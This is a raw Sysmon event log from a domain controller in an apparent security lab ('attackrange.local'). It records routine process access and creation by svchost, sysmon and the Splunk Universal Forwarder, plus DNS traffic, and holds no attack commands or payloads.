12:02:54.055{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-64ED-6064-D500-00000000AE01}56485324C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.064{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.941{266CAFBE-64EF-6064-EA00-00000000AE01}66726668C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000008288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.870{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61931- 354300x80000000000000008287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.870{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54324- 10341000x80000000000000008286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-EA00-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-EA00-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EF-6064-E900-00000000AE01}24882468C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EF-6064-EA00-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.683{266CAFBE-64EF-6064-EA00-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000008278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.629{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.629{266CAFBE-64EF-6064-E800-00000000AE01}46086492C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 